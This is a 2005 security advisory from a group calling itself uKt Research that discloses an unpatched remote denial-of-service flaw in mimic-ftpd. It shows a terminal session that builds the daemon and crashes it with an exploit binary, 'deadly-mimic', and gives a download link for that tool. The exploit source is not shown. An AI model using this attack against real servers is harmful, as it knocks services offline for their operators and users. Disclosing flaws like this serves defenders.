Mimic-FTPD DoS.
9ad2da8ee3ac9c97310f07f387dcd7ad19af61d1795d8374fa5b0a595acb890a
mimic-ftpd remote DoS vulnerability.
number: #12
author: Dark Eagle
date: 18.02.05
vendor: http://mimic.sourceforge.net
status: NO-PATCHES
overview:
mimic sits in the background as a daemon and imitates particular services. So far it has the ability to imitate ftpd and telnetd servers.
-- DE: lol
mimic loves to laugh at people doing silly things and he records everything so that you can laugh too. If you mimic an ftp server, then clients connecting to your ftp server will see nothing wrong.
-- DE: so now, we are laughing at MIMIC :)
details:
[darkeagle@localhost research]$ tar xzvf mimic-1.0.tar.gz
mimic-1.0/
mimic-1.0/include/
mimic-1.0/include/shared.h
mimic-1.0/include/api.h
mimic-1.0/src/
mimic-1.0/src/parse.c
mimic-1.0/src/api.c
mimic-1.0/src/script.c
mimic-1.0/src/log.c
mimic-1.0/src/ftpd.c
mimic-1.0/src/mimic.c
mimic-1.0/src/telnetd.c
mimic-1.0/README
mimic-1.0/script/
mimic-1.0/script/script.conf
mimic-1.0/script/welcome.msg.script
mimic-1.0/ftpd/
mimic-1.0/ftpd/welcome.msg.ftpd
mimic-1.0/ftpd/ftpd.conf
mimic-1.0/INSTALL
mimic-1.0/Makefile
mimic-1.0/telnetd/
mimic-1.0/telnetd/welcome.msg.telnetd
mimic-1.0/telnetd/telnetd.conf
[darkeagle@localhost research]$ cd mimic-1.0
[darkeagle@localhost mimic-1.0]$ make
/usr/bin/gcc src/api.c src/log.c src/mimic.c src/parse.c src/ftpd.c -o ftpd/mimic-ftpd -pthread
/usr/bin/gcc src/api.c src/log.c src/mimic.c src/parse.c src/telnetd.c -o telnetd/mimic-telnetd -pthread
[darkeagle@localhost mimic-1.0]$ cd ftpd
[darkeagle@localhost ftpd]$ ls
ftpd.conf mimic-ftpd* welcome.msg.ftpd
[darkeagle@localhost ftpd]$ ./mimic-ftpd
Can't read configuration file: default.conf
Try: ./mimic-ftpd <file.conf>
[darkeagle@localhost ftpd]$ ./mimic-ftpd ftpd.conf
Port: 21000
Logfile: /var/log/mimic-ftpd.log
Welcomefile: welcome.msg.ftpd
Options: NONE
[darkeagle@localhost ftpd]$ telnet localhost 21000
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 localhost FTP server (Version FTPD-2.1.4(1) 18 21:54:00 ALMT 2005) ready.
lolers!
530 Please login with USER and PASS.
quit
221 Goodbye.
Connection closed by foreign host.
[darkeagle@localhost ftpd]$ cp /home/darkeagle/deadly-mimic /home/darkeagle/research/mimic-1.0/ftpd/deadly-mimic
[darkeagle@localhost ftpd]$ ls
deadly-mimic* ftpd.conf mimic-ftpd* welcome.msg.ftpd
[darkeagle@localhost ftpd]$ ./deadly-mimic
mimic-ftpd remote DOS exploit
by Dark Eagle [Unl0ck Team]
http://unl0ck.void.ru
usage: ./deadly-mimic <IP> <PORT>
(c) 2005 uKt research
[darkeagle@localhost ftpd]$ ./deadly-mimic 127.0.0.1 21000
mimic-ftpd remote DOS exploit
by Dark Eagle [Unl0ck Team]
http://unl0ck.void.ru
Info
[*] IP 127.0.0.1
[*] Port 21000
[+] Attacking...
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host: Connection refused
[darkeagle@localhost ftpd]$ telnet localhost 21000
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host: Connection refused
[darkeagle@localhost ftpd]$ echo "IT'S BIG LOL"
IT'S BIG LOL
[darkeagle@localhost ftpd]$
So, you can see, that this sh1t is very lol_ly :) So, now we are laughing at this sh1t :)
DoS'er, you can download from:
http://unl0ck.void.ru/releases.htm
greetz:
all my greetz go out to:
nekd0 [Happy birthday, man!]
0xdeadbabe [dead babe never die!]
antiq [where are you, dude?]
8ron [where are you too?]
CoKi [best coder]
all GOTFault crew [best researchers]
(c) uKt Research
2004-2005